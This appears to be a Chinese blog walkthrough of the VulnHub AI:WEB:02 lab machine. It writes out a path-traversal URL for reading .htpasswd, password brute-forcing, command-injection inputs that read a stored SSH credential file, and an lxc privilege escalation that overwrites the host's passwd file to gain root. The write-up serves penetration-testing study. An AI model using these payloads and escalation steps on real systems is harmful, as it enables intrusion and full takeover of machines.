AI:WEB:02靶场题解

最新推荐文章于 2023-09-01 15:55:36 发布
最新推荐文章于 2023-09-01 15:55:36 发布
阅读量1.1k 收藏 4
点赞数 2
分类专栏: 渗透靶机学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42133828/article/details/101031031
版权

AI:WEB:02靶场题解

前期准备

镜像下载

https://www.vulnhub.com/entry/ai-web-2,357/

环境配置:

在VM以net连接打开虚拟机

使用的机器:

攻击机:kali linux
靶机:ip随配(192.168.203.136)

渗透开始

1.nmap发现主机,并扫描其ip信息,

nmap --script=vuln 192.168.203.136
发现路径 /webadmin
在这里插入图片描述
使用路径爆破工具:
在这里插入图片描述
检测存在文件
viewing.php
download.php

2.访问网页,并创建登陆账号,发现文件包含漏洞,读取文件

访问网页,注册并登陆账号
在这里插入图片描述

访问文件地址,存在文件包含漏洞,读取apache默认配置文件路径
http://192.168.203.136/viewing.php?file_name=…/…/…/…/…/…/…/…/…//etc/apache2/sites-enabled/000-default.conf
在这里插入图片描述
读取文件 .htpasswd
在这里插入图片描述
发现账户 aiweb2admin

3.爆破账号密码

要是你仔细阅读镜像安装界面作者给的描述 https://www.vulnhub.com/entry/ai-web-2,357/,发现提示爆破的字典
在这里插入图片描述
字典下载:https://github.com/danielmiessler/SecLists
rockyou-45.txt 存在于路径 seclists/Passwords/Leaked-Databases

字典,账号有了,访问页面 http://192.168.203.136/webadmin
输入账号密码并抓包
在这里插入图片描述
配置好参数,字典爆破:
在这里插入图片描述
获得账号密码 aiweb2admin:c.ronaldo
登陆账号

4.找到命令执行的文件,获取ssh登陆账号

命令执行文件:

http://192.168.203.136/webadmin/H05Tpin9555/#
在这里插入图片描述

1.127.0.0.1|find . -type f /var/www/html
2. 127.0.0.1|cat /var/www/html/webadmin/S0mextras/.sshUserCred55512.txt

在这里插入图片描述
获取ssh登陆账号密码:
User: n0nr00tuser
Cred: zxowieoi4sdsadpEClDws1sf

5.提权

ssh登陆帐号 n0nr00tuser
ssh n0nr00tuser@192.168.203.136
在这里插入图片描述

查看二进制文件
find / -perm -u=s -type f 2>/dev/null
浏览完,
这个账户对 lxc (https://blog.csdn.net/u011630575/article/details/65444404)命令权限比较大,以此为突破口,
尝试创建一个容器,并重新写入一个root用户带有密码的passwd文件上传到创建的容器里,
以此来覆盖主机上的passwd文件,再提权为root

lxc start UbuntuMini
lxc config set UbuntuMini security.privileged true
lxc config set UbuntuMini security.nesting true
lxc config device add UbuntuMini sharetesting disk source=/etc path=/sharingiscaring

在主机上新建一个passwd文件,并赋予root密码killem

root:AzbGfP688Nta.:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
aiweb2:x:1000:1000::/home/aiweb2:/bin/bash
n0nr00tuser:x:1001:1001::/home/n0nr00tuser:/bin/bash

在执行命令,将passwd上传到容器里
lxc file push passwd UbuntuMini/sharingiscaring/passwd

提权:

su -root
输入密码
whoami
cat /root/flag.txt
南人旧心1906
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
电工学题解:第二章 正弦交流电路.doc
11-26
电工学题解:第二章 正弦交流电路 本资源摘要信息主要围绕电工学题解的第二章正弦交流电路展开,涵盖了基本要求、基本概念、基本定律、基本分析方法和交流电路中的功率等方面的知识点。 基本要求 本章的基本要求...
pikachu靶场题解-暴力破解
最新发布
qq_44655084的博客
12-13 1265
“暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。
vulnhub靶机AI-Web2渗透笔记
liver100day的博客
07-24 2058
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.3 访问web网页(80端口)2.漏洞利用1 利用目录穿越(Directory Traversal)漏洞读取/etc/passwd2.利用暴力破解获取密码4 获得目标shell提权 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/ai-web-2,357/ 渗透过程 1.信息收集 1..
capture the ether靶场题解(Math)
m0_68764244的博客
11-21 1836
if代码块本身的逻辑是没有问题的,并不会出现变量覆盖的情况,但else就不一样了,由于没有进if,相当于直接创建了一个结构体变量,这势必会造成变量覆盖,而能够覆盖的就是数组的长度以及head。由于数组的长度取决于我们传入的wei数,而在push中会对数组的length++,length又跟amount公用一个slot,所以我们传入1wei则长度和amount都2,我们两次都传入1wei,则第一次push的结构体会被第二次push的结构体覆盖,具体原因我就不一一阐释了。
实战项目之AIWEB2靶场渗透
胖虎的博客
11-05 1297
AIweb2靶场渗透测试
AI: Web: 2靶机-Walkthrough
ins1ght的博客
09-20 2241
AI: Web: 2靶机,中等难度靶机。目录爆破工具啊,漏扫工具啊每次还是多用几个,血的教训……
VulnHub靶场AI Web 2.0
A_dmin的博客
06-26 1385
VulnHub靶场AI Web 2.0 用vm打开靶机,运行kali和靶机 首先肯定查看kali的ip地址,然后使用nmap命令:nmap -sP 192.168.80.0/24扫描主机: 接下来扫描端口,nmap:nmap -p 1-65535 -sV 192.168.80.129: 开放了ssh端口和http端口~~ 老样子,先不管ssh端口,先去看看web网站,,, 发现需要登录,,,...
VulnHub靶机 - AI:Web 2.0
狂吃三碗
04-28 492
VulnHub靶机 - AI:Web 2.0
电工学题解:第八章 交流放大电路.doc
11-26
【电工学题解:第八章 交流放大电路】 交流放大电路是电子技术中核心的一环,主要用于放大交流信号。在本章中,我们将探讨以下几个重要知识点: 1. **交流放大电路的基本构成**: - 偏置形式:确定三极管的工作...
电工学题解:第七章 半导体器件修改.doc
11-26
【电工学题解:第七章半导体器件修】的文档涵盖了半导体器件的基础知识,特别是关于PN结、二极管、稳压管、三极管以及场效应管的介绍。以下是这些知识点的详细说明: 1. **PN结与二极管**: - PN结是由P型半导体和...
rockyou.txt
03-24
kali自带的口令字典,rockyou.txt,大概有1400多万条口令,无重复口令。
rockyou.txt.gz
02-06
Kali Linux Default Dictionary in /usr/share/wordlist,if you need you can take it
rockyou.txt.zip
06-24
1400万+密码、平时自己用、还是能够破解大部分的密码的
电工学题解:第三章 三相交流电路.doc
11-28
《电工学题解:第三章 三相交流电路》 三相交流电路是电力系统的基础,广泛应用于工业、商业和家庭用电。本章主要探讨了对称三相电源的特性和三相负载的不同连接方式,以及相关的功率计算。 对称三相电源由三个...
电工学题解:第一章 电路分析基础.doc
11-26
电工学题解:第一章电路分析基础 电路分析基础是电工学的基础,涉及电路的基本概念、定律、分析方法等。电路分析基础是电工学的核心内容,对于电工学的学科具有重要的意义。 1.1 电路的基本概念 电路是由电阻、...
AI-WEB-2.0 靶机实录
gaopan2667002的博客
09-01 120
file_name=../../../../../../../../../../../../..//etc/apache2/.htpasswd获取到passwd文件。下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;这个文件告诉来访的搜索引擎哪些房间可以进入和参观,哪些房间因为存放贵重物品,或可能涉及住户及访客的隐私而不对搜索引擎开放。的内容时,才需要使用robots.txt文件。--从哪里获取到的这个apache文件的位置,为什么要获取该文件。
鹏城AI靶场助力大规模高质量中文语料数据集安全开放
OpenI启智社区
09-02 340
鹏城实验室率先开放大规模高质量中文语料数据集,研究人员可在鹏城AI靶场上安全使用数据
AI: WEB: 2 WP
qq_37410729的博客
04-12 218
可以看出这是一个用户名和密码,不过密码加密了,我么用john来破解一下,这里用的字典就是题目说明里提到的字典了。读了一些文件都是没用的,最后读到了apache的认证文件/etc/apache2/.htpasswd。和1一样捏,拖入VMware打开,然后用kali扫arp得到靶机的ip地址,然后用nmap扫描端口。不过反弹shell和文件上传都失败了,那就翻翻文件吧,但是翻了半天也没翻到有用的,可能有隐藏文件吧。那应该是别的地方的了。扫到一个webadmin目录,而且需要登陆,试一下刚才的账户,成功登录。
命令执行靶场实战
qq_23347209的博客
05-31 532
文章目录环境准备一、信息搜集1、nmap扫描2、使用nikto扫描网站目录二、漏洞利用测试三、nc反弹shell 环境准备 靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/ 使用Vmware虚拟机中NAT网络 靶机: 192.168.146.153 攻击机 parrot 192.168.146.129 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 1、nmap扫描 -A全面扫描 -p-全端口扫描 nmap -A -p- 192.168
3196:练32.2 种植竹笋题解
10-02
引用中提供的代码是一个解题过程,通过纯数学演算来求解问题。代码中使用了数学公式和循环结构来计算出答案。需要注意的是,数据范围较大,需要使用long long进行计算。 引用[2]中提供的代码是一个按条件比较的过程,根据题目要求的三个条件进行排序。代码中使用了循环结构和条件判断来比较并找出满足条件的最优解。 引用中提供的代码是一个求解问题的过程,根据题目中的规则来计算出答案。代码中使用了循环结构和条件判断来模拟感冒的传播过程,并计算出最后的结果。 综上所述,根据提供的引用内容,可以得出以下结论: 3196:练32.2 种植竹笋题解是一个需要用数学演算、按条件比较或模拟过程来解决的问题。具体的解题方法可以参考引用、和中提供的代码。在解题过程中需要注意数据范围和题目给出的条件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值